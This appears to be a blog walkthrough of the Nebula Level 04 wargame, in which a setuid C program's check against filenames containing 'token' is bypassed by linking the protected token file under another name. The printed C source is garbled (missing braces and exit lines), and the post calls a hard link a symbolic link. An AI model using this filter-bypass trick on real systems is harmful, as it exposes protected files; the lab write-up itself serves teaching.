Nebula Level 04

Level 04 instructions

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);

  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);

  rc = read(fd, buf, sizeof(buf));
  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);

  write(1, buf, rc);

So another C program to fool. On line 13 the program makes sure that it is launched with one command line parameter. If it isn’t the program prints instructions and exits. Line 18 uses strstr┬áto check for the substring “token” in the command line argument. If “token” is found the program will reply with “You may not access” and exits. If “token” isn’t found and the program continues and tries to find a file with the name passed as the argument. If the file is found and can be accessed it will be read and it’s contents will be printed.

The instructions state that the files are in /home/flag04/

cd /home/flag04
ls -al
total 13
drwxr-x--- 2 flag04 level04   93 2011-11-20 21:52 .
drwxr-xr-x 1 root   root     120 2012-08-27 07:18 ..
-rw-r--r-- 1 flag04 flag04   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag04 flag04  3353 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
-rw-r--r-- 1 flag04 flag04   675 2011-05-18 02:54 .profile
-rw------- 1 flag04 flag04    37 2011-11-20 21:52 token

If I try executing the program to read token it exits as expected.

./flag04 token
You may not access 'token'

I don’t have read or write access to the token file so I can’t read its contents or rename it. Instead I create a new symbloic link which is basically just a shortcut to the file. Since my link doesn’t have “token” in the name the program doesn’t fail it’s check and reads the file. I can’t create the link in the flag04 directory due to permissions so I create it in my own home folder.

ln /home/flag04/token ~/new_link
./flag04 ~/new_link

Five levels down. Fifteen to go!

Leave a Reply

Your email address will not be published. Required fields are marked *